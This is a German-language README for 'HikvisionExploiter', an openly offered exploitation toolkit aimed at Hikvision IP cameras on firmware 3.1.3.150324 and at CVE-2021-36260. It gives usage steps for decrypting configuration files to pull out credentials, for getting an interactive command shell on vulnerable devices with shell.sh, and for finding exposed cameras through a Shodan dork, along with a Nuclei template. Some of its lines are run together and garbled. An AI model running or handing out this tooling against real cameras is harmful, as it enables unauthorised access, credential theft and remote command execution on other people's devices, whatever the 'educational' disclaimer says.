
HikvisionExploiter is a Python-based utility designed to automate exploitation and directory accessibility checks on Hikvision network cameras exploiting the Web interface Version 3.1.3.150324 + CVE-2021-36260 Detection
HikvisionExploiter ist ein leistungsstarkes und automatisiertes Exploitation-Toolkit, das auf nicht authentifizierte Endpunkte von Hikvision IP-Kameras abzielt, insbesondere auf solche mit der Firmware-Version 3.1.3.150324.
Es führt folgende Aktionen aus:
Entwickelt für Forscher, Red Teams und IoT-Sicherheitsbegeisterte.
/onvif-http/snapshot-Endpunkt auf Snapshot-Exposition/System/configurationFile herunter, entschlüsselt sie mittels AES + XOR und extrahiert Anmeldedaten/Security/userswebLanguage-Injectionlogs/ThreadPoolExecutorpip install -r requirements.txtffmpeg (optional, für zukünftige Snapshot-zu-Video-Funktion)pycrypto (zur Konfigurationsentschlüsselung):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
Erstelle eine targets.txt-Datei mit folgendem Format:
IP:PORT
Beispiel:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
Dies führt folgende Schritte aus:
logs/IP_PORT_TIMESTAMP/Um interaktiv Befehle auf einem verwundbaren Gerät auszuführen:
chmod +x shell.sh
./shell.sh <ip:port>
Beispiel:
./shell.sh 192.168.1.10:80
Wenn verwundbar, gelangst du in eine interaktive Shell:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
Verwende folgenden Shodan-Dork, um exponierte Hikvision-Kameras zu finden:
3.1.3.150324
Eine Nuclei-kompatible Vorlage ist enthalten: nuclei-template.yaml
Nutzung:
nuclei -t nuclei-template.yaml -list targets.txt
Erkennt:
MIT License ©
Siehe LICENSE für weitere Details.
Telegram: @HexBuddy127001
Mit ❤️ entwickelt für Bildungs- und ethische Forschungszwecke.